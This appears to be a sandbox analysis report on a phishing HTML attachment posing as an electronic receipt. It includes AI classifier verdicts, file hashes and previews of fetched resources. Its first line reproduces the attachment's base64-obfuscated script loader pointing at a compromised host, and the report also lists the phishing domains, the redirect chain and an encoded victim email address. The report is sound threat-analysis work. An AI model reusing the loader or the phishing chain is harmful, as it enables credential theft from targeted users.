                  	document.head.append(Object.assign(document.createElement("script"), {src: atob("aHR0cHM6Ly90dXRvcnMucGljYXNzb3NjaG9vbHMuYWMuYncvNDA0LnBocD8yLTc5Nzk2NzcwNGI1MzY5MzIzMDc0NjQ1MDU0NzM3ODQ5NGMzMDM1NGY1NDQ1NmU1NjRiNzk3MjU2NzkzMDczNzQzMDU1MzgzMDcxNGQ3MTUwNDM3NDQ0NTA3YTQ1NzQ0YTcyNjQ0NDRjNGI0ZDZlNGU0MTUxNDEzZC1BUHdxak1UamI=")}));
                  URL: https://cahgscade.ru.net/a0zoZP/index.html#YYmF1ZG9pbi5kZS1idXNzeUB4ZmFiLmNvbQ== Model: Perplexity: mixtral-8x7b-instruct
                  {
                  "loginform": false,
                  "reasons": [
                  "The text does not contain any form fields that would typically be found in a login form, such as fields for a username or password.",
                  "There is no 'Login' or 'Submit' button in the text, which are common elements of a login form.",
                  "The text contains a warning about potential phishing, which is not typical for a legitimate login form."
                  ]
                  }
                  O Warning Suspected Phishing This website has been reported for potential phishing. Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source. Leam More Ignore & Proceed Cloudflare Ray ID: 888a434e6f2a0f6c  Your IP: Click to reveal  Performance & security by Claudflare 
                  URL: https://cahgscade.ru.net/a0zoZP/index.html Model: Perplexity: mixtral-8x7b-instruct
                  {
                  "loginform": false,
                  "reasons": [
                  "The text does not contain any form fields for a username or password.",
                  "The text does not contain any submit button for a login form.",
                  "The text mentions 'browser checks' for 'security', but it does not indicate that it is a login form."
                  ]
                  }
                  Just a moment,  Verifying... CLOuDFLARE This page is running browser checks to ensure your security. 
                  URL: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/da3ds/0x4AAAAAAAaukL4AS3nPApw3/auto/normal Model: Perplexity: mixtral-8x7b-instruct
                  {
                  "loginform": false,
                  "reasons": [
                  "The text does not contain any form fields or prompts for user input, which are typically found in login forms.",
                  "The text mentions 'verifying' and 'browser checks to ensure your security', which suggests that the page might be performing some sort of security check or validation, but it is not a login form."
                  ]
                  }
                  Just a moment,  Verifying... CLOuDFLARE This page is running browser checks to ensure your security. 
                  URL: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/da3ds/0x4AAAAAAAaukL4AS3nPApw3/auto/normal Model: Perplexity: mixtral-8x7b-instruct
                  ```json
                  {
                    "loginform": false,
                    "reasons": [
                      "The text does not contain any form fields for a username or password.",
                      "There is no mention of a 'login' or 'submit' button.",
                      "The text mentions security checks, but it is unrelated to a login form."
                    ]
                  }
                  Just a moment, Verify you are human CLOuDFLARE This page is running browser checks to ensure your security. 
                  URL: https://cahgscade.ru.net/a0zoZP/index.html Model: gpt-4o
                  ```json
                  {
                    "phishing_score": 9,
                    "brands": "Microsoft",
                    "phishing": true,
                    "suspicious_domain": true,
                    "has_loginform": true,
                    "has_captcha": false,
                    "setechniques": true,
                    "reasons": "The URL 'https://cahgscade.ru.net/a0zoZP/index.html' is highly suspicious as it does not match the legitimate domain name for Microsoft, which is 'microsoft.com'. The page contains a login form, which is a common element in phishing sites. The domain 'ru.net' is unusual for a Microsoft login page, indicating a high likelihood of phishing. The site uses social engineering techniques by mimicking the legitimate Microsoft login page."
                  }
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65447)
                  Category:downloaded
                  Size (bytes):89501
                  Entropy (8bit):5.289893677458563
                  Encrypted:false
                  SSDEEP:
                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                  Malicious:false
                  Reputation:unknown
                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):510
                  Entropy (8bit):5.101056734366354
                  Encrypted:false
                  SSDEEP:
                  MD5:072DFEE79CD13A1A308121D47CD18B71
                  SHA1:8B7DEB4BAE45FD6266F0C58D4C55BE69760BC808
                  SHA-256:6A70D99AE5C2F882DF9C4A3B192EC71063DDC551DDA83595D6FA433808611B55
                  SHA-512:B986C2989E2AA685D30EDE61ABBF15C2E749CC938C2291D018AE4D53AA158DC92D981D778D55382195EE72E383D6A3E9C33A6B41787DCA3308D53E4743960682
                  Malicious:false
                  Reputation:unknown
                  URL:https://href.li/?https://cahgscade.ru.net/a0zoZP/index.html
                  Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://cahgscade.ru.net/a0zoZP/index.html" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/cahgscade.ru.net\/a0zoZP\/index.html" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://cahgscade.ru.net/a0zoZP/index.html">https://cahgscade.ru.net/a0zoZP/index.html</a></p></body></html>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):452
                  Entropy (8bit):7.0936408308765495
                  Encrypted:false
                  SSDEEP:
                  MD5:C33DE66281E933259772399D10A6AFE8
                  SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                  SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                  SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                  Malicious:false
                  Reputation:unknown
                  Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65306)
                  Category:downloaded
                  Size (bytes):155845
                  Entropy (8bit):5.0596333050371385
                  Encrypted:false
                  SSDEEP:
                  MD5:ABE91756D18B7CD60871A2F47C1E8192
                  SHA1:7C1C9E0573E5CEA8BAD3733BE2FC63AA8C68EA8D
                  SHA-256:7633B7C0C97D19E682FEEE8AFA2738523FCB2A14544A550572CAEECD2EEFE66B
                  SHA-512:BAC54101DEBAFCDA5535F0607B5F60C2CDA3E896629E771AD76AC07B697E77E4242D4F5F886D363B55FC43A85EA48A6BFC460A66F2B1FC8F56B27BA326E3A604
                  Malicious:false
                  Reputation:unknown
                  URL:https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css
                  Preview:@charset "UTF-8";/*!. * Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 18 x 17, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):61
                  Entropy (8bit):4.035372245524404
                  Encrypted:false
                  SSDEEP:
                  MD5:A53FA5811ECD4AEC969AF2C748E03F9D
                  SHA1:C087AF9AFEC34C4CDFF7D2BBDEF6A149AB6854A6
                  SHA-256:2A01D28954EEEFDA16926A214DAEA3F659C6DDB1771009EF01BA08071ABDB4AF
                  SHA-512:B8F3C12D6BEDC0A673374E6C794791C7DBB85F00C7388E920298D372A042870B35A9282F97473AB6AD7C219A5CF48918FD84192C233D1FE63020B9A15570C3B8
                  Malicious:false
                  Reputation:unknown
                  Preview:.PNG........IHDR............._8k.....IDAT.....$.....IEND.B`.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                  Category:downloaded
                  Size (bytes):61
                  Entropy (8bit):3.990210155325004
                  Encrypted:false
                  SSDEEP:
                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                  Malicious:false
                  Reputation:unknown
                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with CRLF, LF line terminators
                  Category:downloaded
                  Size (bytes):1249
                  Entropy (8bit):5.242453121762845
                  Encrypted:false
                  SSDEEP:
                  MD5:F58515DFE987F7E027C8A71BBC884621
                  SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                  SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                  SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                  Malicious:false
                  Reputation:unknown
                  URL:"https://cahgscade.ru.net/a0zoZP/,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0OCIgaGVpZ2h0PSI0OCIgdmlld0JveD0iMCAwIDQ4IDQ4Ij48ZGVmcz48c3R5bGU+LmF7ZmlsbDpub25lO30uYntmaWxsOiM0MDQwNDA7fTwvc3R5bGU+PC9kZWZzPjxyZWN0IGNsYXNzPSJhIiB3aWR0aD0iNDgiIGhlaWdodD0iNDgiLz48cGF0aCBjbGFzcz0iYiIgZD0iTTQwLDMyLjU3OFY0MEgzMlYzNkgyOFYzMkgyNFYyOC43NjZBMTAuNjg5LDEwLjY4OSwwLDAsMSwxOSwzMGExMC45LDEwLjksMCwwLDEtNS41NDctMS41LDExLjEwNiwxMS4xMDYsMCwwLDEtMi4yMTktMS43MTlBMTEuMzczLDExLjM3MywwLDAsMSw5LjUsMjQuNTQ3YTEwLjQsMTAuNCwwLDAsMS0xLjEwOS0yLjYyNUExMS42MTYsMTEuNjE2LDAsMCwxLDgsMTlhMTAuOSwxMC45LDAsMCwxLDEuNS01LjU0NywxMS4xMDYsMTEuMTA2LDAsMCwxLDEuNzE5LTIuMjE5QTExLjM3MywxMS4zNzMsMCwwLDEsMTMuNDUzLDkuNWExMC40LDEwLjQsMCwwLDEsMi42MjUtMS4xMDlBMTEuNjE2LDExLjYxNiwwLDAsMSwxOSw4YTEwLjksMTAuOSwwLDAsMSw1LjU0NywxLjUsMTEuMTA2LDExLjEwNiwwLDAsMSwyLjIxOSwxLjcxOUExMS4zNzMsMTEuMzczLDAsMCwxLDI4LjUsMTMuNDUzYTEwLjQsMTAuNCwwLDAsMSwxLjEwOSwyLjYyNUExMS42MTYsMTEuNjE2LDAsMCwxLDMwLDE5YTEwLjAxNSwxMC4wMTUsMCwwLDEtLjEyNSwxLjU3OCwxMC44NzksMTAuODc5LDAsMCwxLS4zNTksMS41MzFabS0yLC44NDRMMjcuMjE5LDIyLjY0MWExNC43MTYsMTQuNzE2LDAsMCwwLC41NjItMS43ODJBNy43NTEsNy43NTEsMCwwLDAsMjgsMTlhOC43ODYsOC43ODYsMCwwLDAtLjctMy41LDguOSw4LjksMCwwLDAtMS45MzgtMi44NTlBOS4yNjksOS4yNjksMCwwLDAsMjIuNSwxMC43MTksOC45LDguOSwwLDAsMCwxOSwxMGE4Ljc4Niw4Ljc4NiwwLDAsMC0zLjUuNyw4LjksOC45LDAsMCwwLTIuODU5LDEuOTM4QTkuMjY5LDkuMjY5LDAsMCwwLDEwLjcxOSwxNS41LDguOSw4LjksMCwwLDAsMTAsMTlhOC43ODYsOC43ODYsMCwwLDAsLjcsMy41LDguOSw4LjksMCwwLDAsMS45MzgsMi44NTlBOS4yNjksOS4yNjksMCwwLDAsMTUuNSwyNy4yODFhOC44NDIsOC44NDIsMCwwLDAsNi40NjkuMkE4Ljc2Nyw4Ljc2NywwLDAsMCwyNC42MDksMjZIMjZ2NGg0djRoNHY0aDRaTTE2LDE0YTEuOTM4LDEuOTM4LDAsMCwxLC43ODEuMTU2LDIsMiwwLDAsMSwuNjI1LjQyMiwyLjE5MSwyLjE5MSwwLDAsMSwuNDM4LjY0MUExLjcwNSwxLjcwNSwwLDAsMSwxOCwxNmExLjkzOCwxLjkzOCwwLDAsMS0uMTU2Ljc4MSwyLDIsMCwwLDEtLjQyMi42MjUsMi4xOTEsMi4xOTEsMCwwLDEtLjY0MS40MzhBMS43MDUsMS43MDUsMCwwLDEsMTYsMThhMS45MzgsMS45MzgsMCwwLDEtLjc4MS0uMTU2LDIsMiwwLDAsMS0uNjI1LS40MjIsMi4xOTEsMi4xOTEsMCwwLDEtLjQzOC0uNjQxQTEuNzA1LDEuNzA1LDAsMCwxLDE0LDE2YTEuOTM4LDEuOTM4LDAsMCwxLC4xNTYtLjc4MSwyLDIsMCwwLDEsLjQyMi0uNjI1LDIuMTkxLDIuMTkxLDAsMCwxLC42NDEtLjQzOEExLjcwNSwxLjcwNSwwLDAsMSwxNiwxNFoiLz48L3N2Zz4="
                  Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):681
                  Entropy (8bit):4.797850757954713
                  Encrypted:false
                  SSDEEP:
                  MD5:FEC8A982BCE8ABB7E974F3282584662A
                  SHA1:FFE1911024A2D4C4E82EDFC8AC9563179FDD0A9A
                  SHA-256:C72CA5BBB3A6BE11EA466F957CD25FD94DC7D0256D7700D05EEFC266A86FE88E
                  SHA-512:A21AE56EE1F6BE755232A9A9875BD4507E8473DD93B9407B970829D762FFEFD21AEC0F8C3DF7612A81FEAF402EB071695289F10F5DC32543A40D811EEE19E36F
                  Malicious:false
                  Reputation:unknown
                  URL:https://tutors.picassoschools.ac.bw/favicon.ico
                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator at . webmaster@tutors.picassoschools.ac.bw to inform them of the time this error occurred,. and the actions you performed just before this error.</p>.<p>More information about this error may be available.in the server error log.</p>.<p>Additionally, a 500 Internal Server Error.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (47992), with no line terminators
                  Category:downloaded
                  Size (bytes):47992
                  Entropy (8bit):5.605846858683577
                  Encrypted:false
                  SSDEEP:
                  MD5:CF3402D7483B127DED4069D651EA4A22
                  SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                  SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                  SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                  Malicious:false
                  Reputation:unknown
                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (42526)
                  Category:downloaded
                  Size (bytes):42527
                  Entropy (8bit):5.373234803143812
                  Encrypted:false
                  SSDEEP:
                  MD5:C667700BE084108F8DEDED9026FFBBF9
                  SHA1:31D633A11EF13A66787EC6504E38C11842664B7B
                  SHA-256:E158035A6F740B0245A027BF0D559C56782EBBEEC7CAB5A827083BD16AA47901
                  SHA-512:9EEA0C81A4D7E7ED7EE7F30A53B5AA93C356129D9850AE978A6D408F0B1337F3E9FCEDE25C996DCA3A2AC9840B86B4D821CD0A9DFFCF8BC427A730F420F33891
                  Malicious:false
                  Reputation:unknown
                  URL:https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js
                  Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function dr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.875
                  Encrypted:false
                  SSDEEP:
                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAm7akya7TBRVRIFDZFhlU4=?alt=proto
                  Preview:CgkKBw2RYZVOGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):573
                  Entropy (8bit):5.197027655743314
                  Encrypted:false
                  SSDEEP:
                  MD5:B6AB4D750EF618415F944DD53887E057
                  SHA1:21BC723DAE78D017BAD207F6B23D3160E146FB97
                  SHA-256:974114FBB9F215EFCC4E55E85D3AAB9E84B496B84FD48A569E86CA7C9A8D0869
                  SHA-512:57D18865649C5E4998B73A48FBA3EF805A47FD455B5A1505B57B67F3E336D599268E00B87D6035A1F6FACB0F22A9744E6C4608C2AA1A4A0082638437A271CE8B
                  Malicious:false
                  Reputation:unknown
                  URL:https://href.li/?https://tutors.picassoschools.ac.bw/404.php?pjaewvLd2DKuff
                  Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://tutors.picassoschools.ac.bw/404.php?pjaewvLd2DKuff" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/tutors.picassoschools.ac.bw\/404.php?pjaewvLd2DKuff" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://tutors.picassoschools.ac.bw/404.php?pjaewvLd2DKuff">https://tutors.picassoschools.ac.bw/404.php?pjaewvLd2DKuff</a></p></body></html>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (24050)
                  Category:downloaded
                  Size (bytes):24051
                  Entropy (8bit):4.941039417164537
                  Encrypted:false
                  SSDEEP:
                  MD5:5E8C69A459A691B5D1B9BE442332C87D
                  SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                  SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                  SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                  Malicious:false
                  Reputation:unknown
                  URL:https://cahgscade.ru.net/cdn-cgi/styles/cf.errors.css
                  Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                  File type:HTML document, ASCII text, with very long lines (324), with CRLF line terminators
                  Entropy (8bit):5.765849528761149
                  TrID:
                  • HyperText Markup Language (12001/1) 66.65%
                  • HyperText Markup Language (6006/1) 33.35%
                  File name:ELECTRONIC RECEIPT_Xfab.html
                  File size:539 bytes
                  MD5:a68191d730aaeda73cabfb744b85a9cb
                  SHA1:871d6ce4a0b1e726a265e642f2e29f1ab6034b42
                  SHA256:900944ba697864f0f8755e8cbfd2df096ec56d570ced06eba7165b25e8b7a01e
                  SHA512:ee30ff4d31380ea8eb51d6f313277d9de71afff1730b39b5637fc541efb4a08c437605c9e2fd063a0ddf5b0dc8b5f58ba11f01044be8bacaa692bacb9f276eba
                  SSDEEP:12:Tmy7C7Hfdb5XBuHnKC70sqbvRa7K2vhPlZMCZ:6CUHnXBuHKC7Hq47KUPlZMCZ
                  TLSH:42F0C06374E68C4E5078D33924B5D55C520294985FB29C40A8DDC9F7584AB511DD2AA1
                  File Content Preview:<html>..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <script>...var APwqjMTjb = "YmF1ZG9pbi5kZS1idXNzeUB4ZmFiLmNvbQ==";...document.head.append(Object.assign(document.createElement("script"),
                  Icon Hash:173149cccc490307